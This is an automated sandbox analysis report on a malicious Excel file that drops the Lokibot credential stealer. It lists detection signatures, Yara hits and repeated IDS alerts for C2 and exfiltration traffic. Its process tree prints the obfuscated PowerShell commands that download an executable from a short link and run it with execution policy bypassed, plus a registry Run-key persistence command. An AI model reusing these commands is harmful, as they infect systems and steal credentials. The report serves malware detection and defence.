Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 6Cprm97UTl

Overview

General Information

Sample Name:6Cprm97UTl (renamed file extension from none to xls)
Analysis ID:336301
MD5:29c8b5edc30eadf757b72b0a14857903
SHA1:77d432fb96a0a453bae30107990c2c9ee0314330
SHA256:a174abce368b775138c203d66fa8a3845aead2d53d87f220c58a2fe8ee7d9cf0

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Lokibot
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Drops PE files to the document folder of the user
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found obfuscated Excel 4.0 Macro
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Obfuscated command line found
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected aPLib compressed binary
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2260 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • cmd.exe (PID: 2292 cmdline: cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 1324 cmdline: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • RegAsm.exe (PID: 2844 cmdline: C:\Users\user\AppData\Local\Temp\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
    • cmd.exe (PID: 2372 cmdline: cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2492 cmdline: powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2468 cmdline: cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2324 cmdline: powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • 12.exe (PID: 2800 cmdline: C:\Users\user\AppData\Local\Temp\12.exe MD5: 1D11ABB9DAC9B15823D1BCAD2B8B3675)
          • cmd.exe (PID: 2244 cmdline: 'cmd.exe' /c REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
            • reg.exe (PID: 1664 cmdline: REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe' MD5: D69A9ABBB0D795F21995C2F48C1EB560)
          • ntrwe.exe (PID: 1916 cmdline: 'C:\Users\user\ntrwe.exe' MD5: 1D11ABB9DAC9B15823D1BCAD2B8B3675)
            • RegAsm.exe (PID: 2192 cmdline: C:\Users\user\AppData\Local\Temp\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
  • ntrwe.exe (PID: 2996 cmdline: 'C:\Users\user\ntrwe.exe' MD5: 1D11ABB9DAC9B15823D1BCAD2B8B3675)
  • ntrwe.exe (PID: 2292 cmdline: 'C:\Users\user\ntrwe.exe' MD5: 1D11ABB9DAC9B15823D1BCAD2B8B3675)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
        • 0x13d0f:$des3: 68 03 66 00 00
        • 0x18100:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
        • 0x181cc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
        0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 75 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          17.2.RegAsm.exe.400000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            17.2.RegAsm.exe.400000.1.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              17.2.RegAsm.exe.400000.1.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                17.2.RegAsm.exe.400000.1.unpackLoki_1Loki Payloadkevoreilly
                • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
                • 0x13ffc:$a2: last_compatible_version
                17.2.RegAsm.exe.400000.1.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
                • 0x12fff:$des3: 68 03 66 00 00
                • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
                • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
                Click to see the 16 entries

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe'), CommandLine: cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe'), CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2260, ProcessCommandLine: cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe'), ProcessId: 2292

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Machine Learning detection for dropped fileShow sources
                Source: C:\Users\user\Documents\12.exeJoe Sandbox ML: detected
                Source: C:\Users\user\ntrwe.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

                Software Vulnerabilities:

                barindex
                Document exploit detected (process start blacklist hit)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 4x nop then mov esp, ebp
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 4x nop then jmp 00318CF3h
                Source: C:\Users\user\ntrwe.exeCode function: 4x nop then jmp 00508CF3h
                Source: C:\Users\user\ntrwe.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                Source: C:\Users\user\ntrwe.exeCode function: 4x nop then mov esp, ebp
                Source: C:\Users\user\ntrwe.exeCode function: 4x nop then jmp 00408CF3h
                Source: C:\Users\user\ntrwe.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
                Source: global trafficDNS query: name: cutt.ly
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.22.0.232:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.22.0.232:443

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.22:49167 -> 83.172.144.37:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49168 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49168 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49168 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49168 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49169 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49169 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49169 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49169 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49170 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49170 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49170 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49170 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49170
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49171 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49171 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49171 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49171 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49171
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49172 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49172 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49172 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49172 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49172
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49173 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49173 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49173 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49173 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49173
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49174 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49174 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49174 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49174 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49174
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49175 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49175 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49175 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49175 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49175
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49176 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49176 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49176 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49176 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49176
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49177 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49177 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49177 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49177 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49177
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49178 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49178 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49178 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49178 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49178
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49179 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49179 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49179 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49179 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49179
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49180 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49180 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49180 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49180 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49180
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49181 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49181 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49181 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49181 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49181
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49182 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49182 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49182 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49182 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49182
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49183 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49183 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49183 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49183 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49183
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49184 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49184 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49184 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49184 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49184
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49185 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49185 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49185 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49185 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49185
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49186 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49186 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49186 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49186 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49186
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49187 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49187 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49187 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49187 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49187
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49188 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49188 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49188 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49188 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49188
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49189 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49189 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49189 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49189 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49189
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49190 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49190 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49190 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49190 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49190
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49191 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49191 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49191 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49191 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49191
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49192 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49192 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49192 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49192 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49192
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49193 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49193 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49193 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49193 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49193
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49194 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49194 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49194 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49194 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49194
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49195 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49195 -> 185.206.215.56:80
